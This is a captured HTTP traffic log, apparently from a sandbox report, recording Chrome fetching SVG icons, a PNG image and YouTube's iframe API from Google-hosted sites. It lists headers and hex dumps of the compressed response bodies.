                                                                                                                                                                                                                                                                                          Cookie: language-choice=x-default
                                                                                                                                                                                                                                                                                          2024-09-27 14:41:41 UTC386INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                          X-Cloud-Trace-Context: 23a5662391a59895f68a41cda6879696
                                                                                                                                                                                                                                                                                          Content-Encoding: gzip
                                                                                                                                                                                                                                                                                          Server: Google Frontend
                                                                                                                                                                                                                                                                                          Content-Length: 425
                                                                                                                                                                                                                                                                                          Date: Fri, 27 Sep 2024 14:41:41 GMT
                                                                                                                                                                                                                                                                                          Expires: Fri, 27 Sep 2024 14:41:42 GMT
                                                                                                                                                                                                                                                                                          Cache-Control: public, max-age=1
                                                                                                                                                                                                                                                                                          ETag: "yqeqwg"
                                                                                                                                                                                                                                                                                          Content-Type: image/svg+xml
                                                                                                                                                                                                                                                                                          Age: 0
                                                                                                                                                                                                                                                                                          Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                                                                                                                                                          Connection: close
                                                                                                                                                                                                                                                                                          2024-09-27 14:41:41 UTC425INData Raw: 1f 8b 08 00 00 00 00 00 02 ff 84 92 cb 6e e3 30 0c 45 7f 85 50 d7 92 29 51 d4 63 10 67 31 7f 52 a4 75 1c 20 8f 22 36 e2 a2 5f 3f 94 ec d8 5d 4c d1 1d 71 21 92 f7 1e 71 37 3c 8e d0 bf 9f 8e fd d8 2a 0e 0a 1e a7 f7 e9 ef ed b3 55 08 08 31 43 d1 a6 d3 db d8 b7 2a 66 05 9f 97 f3 75 68 55 3f 8e 1f 7f 9a 66 9a 26 33 91 b9 dd 8f 8d 43 c4 46 86 a9 fd ee e3 75 ec e1 ad 55 97 18 0c 27 9f 39 45 48 26 06 eb 32 92 3b 68 93 52 ca d1 39 4d c6 93 73 9c 30 48 c9 cc 45 d7 c1 58 6f 33 b1 4f 52 66 a2 9c 88 75 34 58 7a e5 ad 88 98 b2 e7 9c b4 35 21 62 0e 31 7a 4d 68 98 82 cd 81 7f 55 07 ed bc f1 3e 44 0a 11 b0 76 8a 01 cf 36 c2 36 f0 20 86 28 26 94 45 ce 2c 9b 6d 59 8d c8 c1 05 0f 64 96 38 b4 ba f4 19 be d9 94 59 88 96 11 3d 04 e3 e6 98 d5 f2 53 b5 59 e4 54 02 fc 24 0f 08 96
                                                                                                                                                                                                                                                                                          Data Ascii: n0EP)Qcg1Ru "6_?]Lq!q7<*U1C*fuhU?f&3CFuU'9EH&2;hR9Ms0HEXo3ORfu4Xz5!b1zMhU>Dv66 (&E,mYd8Y=SYT$


                                                                                                                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                          117192.168.2.749900172.217.18.174435916C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                          2024-09-27 14:41:42 UTC428OUTGET /static/images/icons/cta-arrow-right.svg HTTP/1.1
                                                                                                                                                                                                                                                                                          Host: recovertogether.withgoogle.com
                                                                                                                                                                                                                                                                                          Connection: keep-alive
                                                                                                                                                                                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                                                          Accept: */*
                                                                                                                                                                                                                                                                                          Sec-Fetch-Site: none
                                                                                                                                                                                                                                                                                          Sec-Fetch-Mode: cors
                                                                                                                                                                                                                                                                                          Sec-Fetch-Dest: empty
                                                                                                                                                                                                                                                                                          Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                                                          Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                                                          Cookie: language-choice=x-default
                                                                                                                                                                                                                                                                                          2024-09-27 14:41:42 UTC386INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                          X-Cloud-Trace-Context: e13bbc9518f916a9670403be072b2590
                                                                                                                                                                                                                                                                                          Content-Encoding: gzip
                                                                                                                                                                                                                                                                                          Server: Google Frontend
                                                                                                                                                                                                                                                                                          Content-Length: 637
                                                                                                                                                                                                                                                                                          Date: Fri, 27 Sep 2024 14:41:42 GMT
                                                                                                                                                                                                                                                                                          Expires: Fri, 27 Sep 2024 14:41:43 GMT
                                                                                                                                                                                                                                                                                          Cache-Control: public, max-age=1
                                                                                                                                                                                                                                                                                          ETag: "yqeqwg"
                                                                                                                                                                                                                                                                                          Content-Type: image/svg+xml
                                                                                                                                                                                                                                                                                          Age: 0
                                                                                                                                                                                                                                                                                          Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                                                                                                                                                          Connection: close
                                                                                                                                                                                                                                                                                          2024-09-27 14:41:42 UTC637INData Raw: 1f 8b 08 00 00 00 00 00 02 ff 7c 94 4b 73 9b 30 10 c7 ef f9 14 5b f5 92 cc 80 d0 03 10 ca 80 33 ad db 66 3a e3 5c fa b8 e4 e2 f1 18 c5 30 26 e0 01 c5 b8 df be 0b 06 97 26 76 74 30 da 07 bf ff 6a 57 38 be 3b 3c 17 b0 37 75 93 57 65 42 38 65 04 4c b9 ae d2 bc dc 24 e4 f7 af 6f 6e 44 ee 66 57 71 b3 df 40 9b a7 36 c3 9c 68 77 20 90 99 7c 93 59 b4 74 67 ed 73 d3 7e ae 0e 09 61 c0 80 47 c0 35 fa fe 41 39 01 94 29 9b 84 64 d6 ee 6e 3d af 6d 5b da 4a 5a d5 1b 4f 30 c6 3c c4 0f 29 b7 87 22 2f b7 e7 12 b9 d6 da eb a3 64 76 05 b8 e2 0f ae 0b f7 a6 34 f5 ca 56 f5 2d fc dc 1a bb ce 20 08 a9 84 eb 88 2b 1e de 80 0b 9d 62 83 92 4d 1f a5 eb ea 19 5c 77 00 d8 dc 16 66 96 af 97 df 4b 6b ea 72 55 2c 50 7b f9 c3 34 16 8f bf ec 0e 1a 7b c7 9c a3 60 6a 9a f5 6c 5e 9b 95 35 29
                                                                                                                                                                                                                                                                                          Data Ascii: |Ks0[3f:\0&&vt0jW8;<7uWeB8eL$onDfWq@6hw |Ytgs~aG5A9)dn=m[JZO0<)"/dv4V- +bM\wfKkrU,P{4{`jl^5)


                                                                                                                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                          118192.168.2.749902172.217.18.174435916C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                          2024-09-27 14:41:42 UTC433OUTGET /static/images/icons/carousel-arrow-right.svg HTTP/1.1
                                                                                                                                                                                                                                                                                          Host: recovertogether.withgoogle.com
                                                                                                                                                                                                                                                                                          Connection: keep-alive
                                                                                                                                                                                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                                                          Accept: */*
                                                                                                                                                                                                                                                                                          Sec-Fetch-Site: none
                                                                                                                                                                                                                                                                                          Sec-Fetch-Mode: cors
                                                                                                                                                                                                                                                                                          Sec-Fetch-Dest: empty
                                                                                                                                                                                                                                                                                          Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                                                          Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                                                          Cookie: language-choice=x-default
                                                                                                                                                                                                                                                                                          2024-09-27 14:41:42 UTC386INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                          X-Cloud-Trace-Context: 91c2c284ca6e69a4952e491e7e844b8a
                                                                                                                                                                                                                                                                                          Content-Encoding: gzip
                                                                                                                                                                                                                                                                                          Server: Google Frontend
                                                                                                                                                                                                                                                                                          Content-Length: 413
                                                                                                                                                                                                                                                                                          Date: Fri, 27 Sep 2024 14:41:42 GMT
                                                                                                                                                                                                                                                                                          Expires: Fri, 27 Sep 2024 14:41:43 GMT
                                                                                                                                                                                                                                                                                          Cache-Control: public, max-age=1
                                                                                                                                                                                                                                                                                          ETag: "yqeqwg"
                                                                                                                                                                                                                                                                                          Content-Type: image/svg+xml
                                                                                                                                                                                                                                                                                          Age: 0
                                                                                                                                                                                                                                                                                          Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                                                                                                                                                          Connection: close
                                                                                                                                                                                                                                                                                          2024-09-27 14:41:42 UTC413INData Raw: 1f 8b 08 00 00 00 00 00 02 ff 6c 52 4d 6f 9c 30 10 bd e7 57 4c a7 97 44 aa 6d 6c a0 81 15 10 a9 95 da 7b d3 9e 2b b2 38 60 ad d7 46 b6 b3 6c fe 7d cd 57 1b 45 9d d3 8c df e3 bd f9 a0 7a b8 9e 35 5c a4 f3 ca 9a 1a 39 4d 10 a4 39 da 4e 99 be c6 5f 3f bf 91 02 1f 9a 9b ca 5f 7a 98 54 17 86 c8 49 c7 2b c2 20 55 3f 84 1a 45 32 57 17 25 a7 2f f6 5a 63 02 09 f0 14 44 94 79 23 ca 11 a2 8d f1 35 0e 21 8c 07 c6 a6 69 a2 53 4a ad eb 99 48 92 84 45 f9 8d 72 b8 6a 65 4e ff 23 f2 b2 2c d9 82 62 73 03 31 aa 0f 84 c0 77 69 a4 6b 83 75 07 78 3c c9 70 1c 20 cf a9 80 db fb 82 17 fc 0e 08 cc 8e 3e 5a fa 05 6d c7 91 1e ed 19 08 d9 34 82 0a 5a 36 ad 73 76 aa d8 5a ac e2 9d f4 c7 e6 ab 93 6d 90 5d 1c 3d 0c 9b 3e ad d8 02 ad ac 1e 54 57 e3 e3 eb f9 c9 6a 8f e0 83 b3 27 59 a3 b1
                                                                                                                                                                                                                                                                                          Data Ascii: lRMo0WLDml{+8`Fl}WEz5\9M9N_?_zTI+ U?E2W%/ZcDy#5!iSJHErjeN#,bs1wikux<p >Zm4Z6svZm]=>TWj'Y


                                                                                                                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                          119192.168.2.749901142.250.185.974435916C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                          2024-09-27 14:41:42 UTC544OUTGET /wtw1KX4QKxdb9HbcQHRw4WsP88O76isYP8JmYFcVpXjHy0tckXFnms1Hgm8jbw8cY53Mx7b-x28HuQkP3nszcom9PGbKiLK1EKkSiqmb=w2000 HTTP/1.1
                                                                                                                                                                                                                                                                                          Host: lh3.googleusercontent.com
                                                                                                                                                                                                                                                                                          Connection: keep-alive
                                                                                                                                                                                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                                                          Accept: */*
                                                                                                                                                                                                                                                                                          X-Client-Data: CI62yQEIpLbJAQipncoBCNrwygEIlaHLAQiFoM0BCLnKzQEIitPNARj1yc0BGOuNpRc=
                                                                                                                                                                                                                                                                                          Sec-Fetch-Site: none
                                                                                                                                                                                                                                                                                          Sec-Fetch-Mode: cors
                                                                                                                                                                                                                                                                                          Sec-Fetch-Dest: empty
                                                                                                                                                                                                                                                                                          Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                                                          Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                                                          2024-09-27 14:41:42 UTC534INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                          Access-Control-Allow-Origin: *
                                                                                                                                                                                                                                                                                          Timing-Allow-Origin: *
                                                                                                                                                                                                                                                                                          Access-Control-Expose-Headers: Content-Length
                                                                                                                                                                                                                                                                                          Content-Disposition: inline;filename="unnamed.png"
                                                                                                                                                                                                                                                                                          X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                                                                          Server: fife
                                                                                                                                                                                                                                                                                          Content-Length: 1218685
                                                                                                                                                                                                                                                                                          X-XSS-Protection: 0
                                                                                                                                                                                                                                                                                          Date: Fri, 27 Sep 2024 14:03:48 GMT
                                                                                                                                                                                                                                                                                          Expires: Sat, 28 Sep 2024 14:03:48 GMT
                                                                                                                                                                                                                                                                                          Cache-Control: public, max-age=86400, no-transform
                                                                                                                                                                                                                                                                                          Age: 2274
                                                                                                                                                                                                                                                                                          ETag: "v1"
                                                                                                                                                                                                                                                                                          Content-Type: image/png
                                                                                                                                                                                                                                                                                          Vary: Origin
                                                                                                                                                                                                                                                                                          Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                                                                                                                                                          Connection: close
                                                                                                                                                                                                                                                                                          2024-09-27 14:41:42 UTC856INData Raw: 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 05 00 00 00 02 d0 08 06 00 00 00 cf 7d dd 56 00 00 00 01 73 52 47 42 00 ae ce 1c e9 00 00 00 f6 65 58 49 66 4d 4d 00 2a 00 00 00 08 00 07 01 12 00 03 00 00 00 01 00 01 00 00 01 1a 00 05 00 00 00 01 00 00 00 62 01 1b 00 05 00 00 00 01 00 00 00 6a 01 28 00 03 00 00 00 01 00 02 00 00 01 31 00 02 00 00 00 25 00 00 00 72 01 32 00 02 00 00 00 14 00 00 00 98 87 69 00 04 00 00 00 01 00 00 00 ac 00 00 00 00 00 00 00 48 00 00 00 01 00 00 00 48 00 00 00 01 41 64 6f 62 65 20 41 66 74 65 72 20 45 66 66 65 63 74 73 20 32 30 32 30 20 28 4d 61 63 69 6e 74 6f 73 68 29 00 00 32 30 32 32 3a 30 39 3a 30 38 20 31 36 3a 35 33 3a 35 34 00 00 04 90 04 00 02 00 00 00 14 00 00 00 e2 a0 01 00 03 00 00 00 01 00 01 00 00 a0 02 00
                                                                                                                                                                                                                                                                                          Data Ascii: PNGIHDR}VsRGBeXIfMM*bj(1%r2iHHAdobe After Effects 2020 (Macintosh)2022:09:08 16:53:54
                                                                                                                                                                                                                                                                                          2024-09-27 14:41:42 UTC1390INData Raw: 6f 62 65 2e 63 6f 6d 2f 78 61 70 2f 31 2e 30 2f 22 0a 20 20 20 20 20 20 20 20 20 20 20 20 78 6d 6c 6e 73 3a 70 68 6f 74 6f 73 68 6f 70 3d 22 68 74 74 70 3a 2f 2f 6e 73 2e 61 64 6f 62 65 2e 63 6f 6d 2f 70 68 6f 74 6f 73 68 6f 70 2f 31 2e 30 2f 22 3e 0a 20 20 20 20 20 20 20 20 20 3c 65 78 69 66 3a 43 6f 6c 6f 72 53 70 61 63 65 3e 36 35 35 33 35 3c 2f 65 78 69 66 3a 43 6f 6c 6f 72 53 70 61 63 65 3e 0a 20 20 20 20 20 20 20 20 20 3c 65 78 69 66 3a 50 69 78 65 6c 58 44 69 6d 65 6e 73 69 6f 6e 3e 31 39 32 30 3c 2f 65 78 69 66 3a 50 69 78 65 6c 58 44 69 6d 65 6e 73 69 6f 6e 3e 0a 20 20 20 20 20 20 20 20 20 3c 65 78 69 66 3a 50 69 78 65 6c 59 44 69 6d 65 6e 73 69 6f 6e 3e 31 30 38 30 3c 2f 65 78 69 66 3a 50 69 78 65 6c 59 44 69 6d 65 6e 73 69 6f 6e 3e 0a 20 20 20
                                                                                                                                                                                                                                                                                          Data Ascii: obe.com/xap/1.0/" xmlns:photoshop="http://ns.adobe.com/photoshop/1.0/"> <exif:ColorSpace>65535</exif:ColorSpace> <exif:PixelXDimension>1920</exif:PixelXDimension> <exif:PixelYDimension>1080</exif:PixelYDimension>
                                                                                                                                                                                                                                                                                          2024-09-27 14:41:42 UTC1390INData Raw: 20 20 20 20 3c 2f 72 64 66 3a 6c 69 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 2f 72 64 66 3a 53 65 71 3e 0a 20 20 20 20 20 20 20 20 20 3c 2f 78 6d 70 4d 4d 3a 48 69 73 74 6f 72 79 3e 0a 20 20 20 20 20 20 20 20 20 3c 78 6d 70 4d 4d 3a 4f 72 69 67 69 6e 61 6c 44 6f 63 75 6d 65 6e 74 49 44 3e 78 6d 70 2e 64 69 64 3a 30 65 33 64 64 34 64 39 2d 37 66 63 34 2d 34 37 31 65 2d 61 33 31 38 2d 65 37 61 35 38 32 63 38 63 37 64 30 3c 2f 78 6d 70 4d 4d 3a 4f 72 69 67 69 6e 61 6c 44 6f 63 75 6d 65 6e 74 49 44 3e 0a 20 20 20 20 20 20 20 20 20 3c 78 6d 70 4d 4d 3a 44 6f 63 75 6d 65 6e 74 49 44 3e 61 64 6f 62 65 3a 64 6f 63 69 64 3a 70 68 6f 74 6f 73 68 6f 70 3a 34 31 30 36 30 32 36 34 2d 32 39 61 38 2d 63 36 34 39 2d 61 65 35 66 2d 65 31 63 34 32 33 62 65 33 64 37 32
                                                                                                                                                                                                                                                                                          Data Ascii: </rdf:li> </rdf:Seq> </xmpMM:History> <xmpMM:OriginalDocumentID>xmp.did:0e3dd4d9-7fc4-471e-a318-e7a582c8c7d0</xmpMM:OriginalDocumentID> <xmpMM:DocumentID>adobe:docid:photoshop:41060264-29a8-c649-ae5f-e1c423be3d72
                                                                                                                                                                                                                                                                                          2024-09-27 14:41:42 UTC1390INData Raw: c6 6a bd 2d ae ed ad 42 36 89 b1 76 a6 6d 77 fd b0 b1 b4 b5 52 6c fd c2 bc 2f 9e 1e 69 2c 28 51 ed 2b c3 b9 44 3d 8d 07 e9 9f 5f d0 01 b5 b6 7d e5 01 98 d7 65 be f8 f8 1e cd bf 3d 13 b3 e0 5b 67 dc d4 f6 ef d1 59 be d1 53 a9 4f c0 b0 c9 be f6 f1 ae 45 d1 56 d6 d4 55 8f 7a c2 eb 6d 6a fb e9 fb ea 14 fc e9 93 07 6d fc 41 ac 30 3e 0d bb 30 71 4c 31 29 41 3f 64 de 54 0f 78 ad fd 6f 4f 8e 4f 67 9c 75 68 07 57 7b 2e b1 1d 59 ca 01 f7 03 24 e5 ec f8 03 04 58 fd 26 5d 9a 4f 19 63 0e 55 49 c6 8d c9 71 57 9a 95 11 da 4b 9f b2 6e ed 58 1b bd eb 4f fb ba 29 57 6d 01 1e 7b 22 8f f6 53 fe f7 1f bc fe cb b7 6f df 69 a7 67 7c 4f d9 16 7f 07 f7 e5 b7 ef 19 11 d3 6e df 5f 18 c7 be 33 ce 30 9e 49 27 57 70 f4 d3 8b 77 e2 55 9d b5 99 5b e4 2b 3b fd 92 36 d7 3f ca df d8 41 50
                                                                                                                                                                                                                                                                                          Data Ascii: j-B6vmwRl/i,(Q+D=_}e=[gYSOEVUzmjmA0>0qL1)A?dTxoOOguhW{.Y$X&]OcUIqWKnXO)Wm{"Soig|On_30I'WpwU[+;6?AP
                                                                                                                                                                                                                                                                                          2024-09-27 14:41:42 UTC1390INData Raw: d8 67 b6 47 e7 a6 be fe 73 92 22 67 3f 89 bd 5e a0 e3 e5 80 6a 5d 30 87 9f 83 a2 13 aa 83 78 37 48 e2 77 f0 27 72 2e 3c cb e3 5e 83 1d e8 84 cb 52 1d d4 e9 85 c3 07 ed c8 b4 6a 59 38 7f 4e f8 7f 25 c9 eb 8c db 70 bf 94 cb e9 e7 ef 4c 9a aa 0d 2e ff 87 ce 96 1d 54 37 65 42 b1 3c 73 d3 13 ca 98 f5 30 15 e7 64 82 73 30 ce 82 4e 46 24 65 ab f7 77 16 15 da e2 42 44 be 1a eb e1 9f 7d 3e fe 5b 7f ab 48 d2 29 d7 e2 45 8d 56 73 0d 26 3c 5c 1c 64 12 82 ef 2e 78 0c 04 39 1c f6 c7 71 cb bb 2c b6 4e 1b 2a 0d dd ac 4a f3 15 b7 8b d1 d1 51 7f 94 6b 6c 8d 5f 63 67 63 26 76 49 7f 51 7d 7d af fe bb c1 13 a5 a9 b1 f4 19 be f5 5f df d5 ae f6 e9 87 ea ba b2 a4 ba e6 ab 97 b2 8a f7 88 6b f1 6b 87 8c 2d 3f b3 11 d1 f1 2e b2 4c 59 74 4e 5d ca d8 ee 78 70 c8 52 a1 07 29 0b 49 e0
                                                                                                                                                                                                                                                                                          Data Ascii: gGs"g?^j]0x7Hw'r.<^RjY8N%pL.T7eB<s0ds0NF$ewBD}>[H)EVs&<\d.x9q,N*JQkl_cgc&vIQ}}_kk-?.LYtN]xpR)I
                                                                                                                                                                                                                                                                                          2024-09-27 14:41:42 UTC1390INData Raw: 4f 68 9b 95 7e f0 03 b2 0a 9d 24 ff cb 72 f7 b6 ac 8d f7 0a a9 f2 9e 36 df 7a e5 16 33 3e 5c 04 0d 35 b8 fe 46 52 9e ba 65 e0 e7 9e 3c 5e f5 9e 43 30 79 fe 5d fe 32 ff 95 5a 5b c7 3d 8b ac 69 3b 17 0a 4e 0f cc 11 98 95 e1 7c 06 49 27 44 16 87 3e 45 f1 ca 0a 56 3a 69 46 5f 75 5e 91 89 8b a0 70 51 0d f0 5c 1c 66 22 d3 9e 02 03 df 4d ba eb b0 3c 89 c7 84 ab cd 99 b0 b8 67 31 81 2c 65 27 09 83 05 ec 72 61 c8 8a 99 b3 7e 4a 2c ae 88 e8 03 9e ba 81 cc 5d 21 e4 59 28 9a ec b7 37 93 68 d1 52 d7 4b e3 b8 71 5e 3b ce ca fa a6 6a 2d 06 b5 33 39 ad 4c f1 d7 37 59 f4 23 23 34 25 6c cf 21 af 8f b2 5d ca e1 43 88 c0 b3 6f 41 3f 57 73 be cb e7 46 d5 03 80 f2 69 bc 04 45 3f f3 17 5e d8 ea c2 c9 45 93 e5 6b ba 2b a6 2a 18 11 06 bd 0b 67 a0 d9 80 82 5c eb ea 0b 91 d7 8e 71
                                                                                                                                                                                                                                                                                          Data Ascii: Oh~$r6z3>\5FRe<^C0y]2Z[=i;N|I'D>EV:iF_u^pQ\f"M<g1,e'ra~J,]!Y(7hRKq^;j-39L7Y##4%l!]CoA?WsFiE?^Ek+*g\q
                                                                                                                                                                                                                                                                                          2024-09-27 14:41:42 UTC1390INData Raw: 76 a1 71 cc 5c e7 7e df 60 ba 1a bb 3c ae 77 f9 d9 f1 92 0c 18 32 87 0c 0a c9 4f 7d 07 45 1b b1 15 36 8e f5 91 e1 a8 6f 02 20 97 d4 1d 8c 5a b5 3a 59 da fc c9 7f e8 8b fa a7 ae 2b 37 f2 d6 86 a1 5c fe 16 c5 33 d9 7d d7 61 42 4e f5 90 fd 40 7c 70 06 29 37 f8 3c 39 f1 eb a7 19 9c e5 d2 81 44 b0 83 c4 03 46 ca 35 c5 bf b7 f5 f5 60 ab ff 77 ba c6 b7 a3 f3 79 73 e1 e3 00 76 da 60 ce 0e d8 77 39 4f 0b 16 47 3e eb 7f 7d 28 7e 5e c3 63 dc 7b c3 53 2e 4b 63 7e 53 27 76 df b9 ec 26 05 a4 4e 34 33 71 1e 0d 3a ed bd 74 bf be b7 05 b2 19 40 99 5f b6 07 f5 c6 9a 4f 6a b4 dd ab a7 93 4f 3e f6 12 cb 52 c5 60 0b 8e 8b 63 74 b5 5f c6 5c 8d 35 a3 7e 63 bf 7e cb f9 0e 9d 2b 4f 5d 47 86 dc 95 e4 dd 4b ae d0 38 a8 6b 7b 27 22 f6 09 c0 22 62 30 c1 83 59 d1 bb a1 74 53 6d f2 2a
                                                                                                                                                                                                                                                                                          Data Ascii: vq\~`<w2O}E6o Z:Y+7\3}aBN@|p)7<9DF5`wysv`w9OG>}(~^c{S.Kc~S'v&N43q:t@_OjO>R`ct_\5~c~+O]GK8k{'""b0YtSm*
                                                                                                                                                                                                                                                                                          2024-09-27 14:41:42 UTC1390INData Raw: b0 72 a2 92 9f 1f fb 07 21 6f 2a c1 29 63 9f b2 c2 35 a4 b9 08 b9 4f e1 0f 9e 12 ed 1b 7e 12 2c 6f 26 d2 32 da 62 6a 9f 5a 5d f4 8f 32 53 c3 85 f9 8c 3f 20 58 cd ab 15 a9 0f 8a 68 f7 09 45 36 2e e3 93 e8 5a fe d6 a4 8f 5e 88 13 4b f2 78 64 80 f8 4e 64 77 a9 e3 3f ed 02 6f 5f ab 6f e4 0d a3 83 ef 1d ad 45 f5 b3 55 55 6d f1 4a fb 19 d9 51 48 5f e5 eb 4f a0 2b bd de f8 75 92 ef f2 54 5f d3 96 cd 0b d1 32 77 56 9b ae f5 0b 3b 68 01 1c f5 f0 fb 95 7c f1 d6 9d 6b df f2 fb e5 7d 89 7e 89 34 3e 7b a0 c0 ea 17 99 53 9f 87 b2 54 e7 46 e5 25 4e 03 20 6d 1c b4 5a af 1e b9 db 4a 93 fe 92 31 4b f4 e0 ae f8 e5 da 8e b0 a5 bd 3f 20 fa 12 e4 60 61 10 9e 0d fe 15 aa 78 26 fb f6 ba 60 ef d6 64 5c 09 c6 a3 cb c5 83 36 70 4e 5d 4e 3e 5a d4 8d fa 23 da 13 76 b6 05 fc f4 7b fe
                                                                                                                                                                                                                                                                                          Data Ascii: r!o*)c5O~,o&2bjZ]2S? XhE6.Z^KxdNdw?o_oEUUmJQH_O+uT_2wV;h|k}~4>{STF%N mZJ1K? `ax&`d\6pN]N>Z#v{
                                                                                                                                                                                                                                                                                          2024-09-27 14:41:42 UTC1390INData Raw: 4f 8c 00 0f 8e da 11 6b e4 f5 6b 7d e8 53 c1 fd 98 b5 e2 84 f9 5d ce 51 27 2a 51 20 59 3e c6 35 65 6f 80 58 c7 4b 3a 31 13 17 f2 01 a8 6e 8e 89 a2 5a 5b 79 f8 11 58 a8 88 3d ce 62 53 17 79 43 57 89 a0 84 f3 f0 91 87 0a 82 2d 38 f9 e0 13 37 dc f7 90 32 df 45 29 1e 38 59 13 89 a3 6e 73 97 6b 23 27 9c 74 6f da 35 f6 91 d7 2e 7d 68 f2 06 59 b5 c0 d9 2f f3 91 6a 9d 61 1d 53 0a cd 6f 9c 36 c9 23 31 77 c8 c4 7e aa 72 36 8d 9d 9b 52 a6 20 5d da 81 5c 74 84 5e dd 54 76 e3 21 fb 0b 85 c9 a9 55 dc e3 34 81 64 e1 02 3c df c3 87 3f 9f 5c 4f e4 e9 e1 f2 5f ed 8e 3e 09 8d 6d 61 ff 34 f7 c3 ef 62 45 f1 3c 71 ac 33 d2 3f 89 7b d8 e6 90 9b 37 63 6b 44 47 9d a8 22 1a 49 7b b5 a1 a9 35 29 47 7f a1 57 ec 29 4b 73 d9 d8 24 b6 19 e3 46 9d b0 8a 2f 92 2b 8d ba 57 d2 29 ed a8 7e
                                                                                                                                                                                                                                                                                          Data Ascii: Okk}S]Q'*Q Y>5eoXK:1nZ[yX=bSyCW-872E)8Ynsk#'to5.}hY/jaSo6#1w~r6R ]\t^Tv!U4d<?\O_>ma4bE<q3?{7ckDG"I{5)GW)Ks$F/+W)~
                                                                                                                                                                                                                                                                                          2024-09-27 14:41:42 UTC1390INData Raw: 0d 54 68 11 75 2a d5 78 43 8f f0 44 6f 39 b3 6e 89 be 52 8f 8e 10 70 a8 0c a9 1a 90 f7 7b e5 d4 c1 bc 3a e9 81 5c d1 29 f5 42 3c 54 a2 dd 8e 38 52 36 f8 26 f5 91 5e 7d ba ae 43 37 e1 5c 32 36 ab 98 e4 5c 32 ce 42 47 31 38 b6 99 7f 2e b3 d2 f6 61 28 1d 1d 56 3c 6c 51 27 19 48 13 99 63 ab be a8 4f a5 9d 43 47 b8 ca bd aa f9 86 af 7a e8 53 e1 6d cb e8 a8 ce 2a 09 7f 47 8b 64 73 2d 2f 9d 96 3f 65 08 2f 43 35 48 be 87 fe 6d 8b c0 1c 1b 96 0b e8 44 23 e5 da 1f 39 96 e1 69 0a 5e f8 69 b4 74 4d 8e b9 82 9d 5f d3 ce e8 f6 9d 97 df 45 99 c3 22 e8 a9 4a 9c fd c6 57 15 24 ee a0 e9 d7 ca c8 85 5a f4 d0 17 ae f3 8c 33 5d 9f 75 61 44 54 52 78 59 16 5d 9d 46 2f ef 86 ac ba 67 8e 0f cd e0 04 5d e9 4d e6 0e 7b 46 2f 95 8f af d2 d6 d4 83 e3 f0 ec a1 56 0f cd e0 cb 38 66 4c
                                                                                                                                                                                                                                                                                          Data Ascii: Thu*xCDo9nRp{:\)B<T8R6&^}C7\26\2BG18.a(V<lQ'HcOCGzSm*Gds-/?e/C5HmD#9i^itM_E"JW$Z3]uaDTRxY]F/g]M{F/V8fL


                                                                                                                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                          120192.168.2.749910142.250.186.1424435916C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                          2024-09-27 14:41:42 UTC449OUTGET /iframe_api?trustedtypes=1 HTTP/1.1
                                                                                                                                                                                                                                                                                          Host: www.youtube.com
                                                                                                                                                                                                                                                                                          Connection: keep-alive
                                                                                                                                                                                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                                                          Accept: */*
                                                                                                                                                                                                                                                                                          X-Client-Data: CI62yQEIpLbJAQipncoBCNrwygEIlaHLAQiFoM0BCLnKzQEIitPNARj1yc0BGOuNpRc=
                                                                                                                                                                                                                                                                                          Sec-Fetch-Site: none
                                                                                                                                                                                                                                                                                          Sec-Fetch-Mode: cors
                                                                                                                                                                                                                                                                                          Sec-Fetch-Dest: empty
                                                                                                                                                                                                                                                                                          Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                                                          Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                                                          2024-09-27 14:41:43 UTC2571INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                          Content-Type: text/javascript; charset=utf-8
                                                                                                                                                                                                                                                                                          X-Content-Type-Options: nosniff
